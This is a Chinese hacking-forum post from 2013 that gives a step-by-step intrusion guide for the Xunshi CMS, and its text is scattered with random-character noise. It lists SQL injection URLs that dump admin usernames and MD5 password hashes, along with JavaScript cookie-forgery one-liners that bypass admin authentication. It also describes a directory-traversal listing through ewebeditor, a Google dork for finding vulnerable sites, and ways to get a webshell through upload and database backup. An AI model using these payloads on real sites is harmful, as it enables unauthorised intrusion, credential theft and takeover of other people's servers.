找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2502|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘
! }; v/ t+ z9 z6 a# i
& a# |* f! F: T! U+ L8 Y在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
: Q/ y2 _3 |$ q. U3 a4 ^9 K4 ]" T8 C
. ]  u+ _1 b2 ^以下本文总结来自黑防去年第9期杂志上的内容...
2 w0 s) L/ b$ y5 l# l) `9 |4 ]+ }# N( G) F+ [# A5 {$ Z8 |
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
4 d, F$ K- j" w2 i5 j/ q& R/ a! m/ B* B# d  F& J* Q2 i
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
5 q5 ]' p# }7 }5 |: a$ F, ~. ^; K+ l+ r/ |7 P! C: d3 d
记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况: C. c/ \/ J% \, D# J
这里一个注入# L: H5 p3 ]2 n$ x

4 U, z5 ?; \$ c' a! p) g0 u0 U# u5 X效果如图:+ D8 z1 V% ~& Z' d
6 n& q: r0 X% H( w' U8 H8 c0 J
: |0 @$ l1 l% b% u" ?, J% Z# z
/ Z8 D3 V* `% }* E/ f
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.7 a4 U1 c% t# d! C8 B
5 t. |: u) J. F
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去: B0 R' x$ ?. M, x
6 X0 |# u3 Q/ p9 Y% A. d9 P
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));1 Y# F) L3 F, D. @' c! T, P" Y  ]" F

& Z1 p" A/ ^0 x& s# ?, @5 _那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:3 ~# p& M9 i9 d+ v4 `# G6 |  L( i) `

2 b* i0 p4 f$ f% j2 T' A因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
% {1 d2 Q9 F- u/ x# `6 K* \! d& x
5 Y% i# j) d1 L% w它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
4 o7 I# b9 v4 G( K
  ~/ D3 P2 E/ u; P5 k访问这页面来列目录..步骤如下:
+ `) Z6 r0 L; _/ ]: m) u; I4 N# ?4 z
javascript:alert(document.cookie="admindj=1") % U) |. b( e! u8 H) v6 M& G! X
7 F7 i5 F& P  {
http://www.political-security.co ... asp?id=46&dir=../..! e; o0 e7 I2 O. y

7 W: b/ \) @; Q" h效果如图:# f$ j, |: `( e9 [. L" j; u& U

- Y/ }2 T- I% M9 g' V/ X+ v 0 B; P* L" o. I* j+ z0 L  Y! b

7 W4 Q4 D* g4 j* G7 E6 |* d" }  a这样全站目录都能瞧了..找到后台目录..进去..
- m9 _6 ~7 F! P9 S1 X9 l, Q9 m- Z' p+ X
那么进了后台怎么拿shell??上传--备份就ok了..
' o5 d0 v# k  Z9 p2 Q" B* P6 f' w4 l8 b4 R; O
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..' ]0 s' p: I9 e  E: M
+ f3 y  j0 E- V+ b  W! H) h
这个我也碰到过一次..你都可以通过列目录来实现..2 x2 r% m0 T$ }- ]5 B/ B& h2 r

, g8 G7 t' u$ T- {javascript:alert(document.cookie="admindj=1")
1 y5 i3 ]" f# i, H+ |; {; i
: M! o8 K% j( B/ b! Khttp://www.political-security.co ... p?action=BackupData
5 F+ o1 {! h) w0 G7 k2 f2 Z, B8 _0 l
备份ok..3 P5 I' Q+ ?! i$ J: W  n
9 ~1 J/ F& }# A4 i" ]3 b1 g
那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?6 h" U* R. I: \4 ?. [

1 P! u# R  O! |7 r' I在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下1 B  c# g  @+ \7 N

5 q' W" p% w( k+ f. x0 J然后访问此页面进行注入..步骤如下:# v! X' c+ [4 @6 f5 S% r( ?
7 M2 e, V0 W/ N/ Y7 I; J$ x4 p
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")% k. k# k: c) t% H

- a) N9 i" G6 j) h- o然后请求admin/admin_chk.asp页面
7 K/ V0 N. d3 `- @" y3 u0 y# W- r7 W' O/ h
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%6 ~% N0 ]6 A% P

+ U2 F- p* t3 [8 I3 o) }, l26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin7 z" k: g6 y6 N

% N" C5 y4 |& N% n1 t效果如图所示:7 s; j  ?2 A# H" g" {
9 @4 Z- }9 W0 X3 Y/ t, Q9 Y1 t
$ K; t# _: N5 B+ }! E
6 W8 g/ e3 x+ G& r
讯时漏洞2
1 m5 p! x/ x2 a7 f5 ^0 U* B/ kgoogle关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)/ h% [! S- G+ k
- B9 F  ]) b/ m+ I4 q
1、/admin/admin_news_pl_view.asp?id=1% Q! q  P& k4 l
//id任意 填入以下语句
1 j' i3 b- H+ U5 H# {2 ^- U
( _5 `4 N4 |+ `. G6 ~- k2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
2 P& z; L$ i* ~6 K0 e % y/ R  d# c) {! _
( I* @: d' _! N4 g
/ F4 j- L% N2 ^+ Y; @2 s+ \
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='3 V  }2 g- K7 E; w0 h% W) C
; N: q* Y3 d9 {* l0 |
  }, T9 N( T3 \8 u/ x
9 C" H( F$ g0 S& J
爆出管理员帐号和密码了
8 ?8 I' u5 ~* A3 Z/ g! @' w ; n% |5 Q6 I4 r
9 A" f4 _4 Q9 H8 J; v, d7 |

) Z# K  w+ P+ ^8 U3 s( L4、cookies进后台7 r$ u" m6 w* R" h6 h% y
! }: Q: \* K3 c( M1 v
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
; B$ E/ O7 A3 i9 t' [ 9 k7 l, y* ^6 z) Y. f( t
% U3 x8 F# ]5 B2 J" z+ I6 `

5 A+ B7 n: v) R1 T  m5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!( ^( l: z, Q. b# ~  e
2 t8 v1 @; F; G6 l

5 p/ s+ S% s" F
7 `' n% G" G; P2 G9 h6、后台有上传和备份取SHELL不难。1 Q2 y) B8 `/ x5 i/ n

: L) |" t& v+ [5 J2 e1 l7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..! K( E' e$ x: r8 l$ w& D

( w' ~8 l% P2 d+ q  I; R9 U逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!# ?; f  A1 h2 ]
) C5 R5 a$ a/ J+ J) X6 A

0 b2 j/ l+ D0 D
" |. y; A% `1 q, p9 R
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表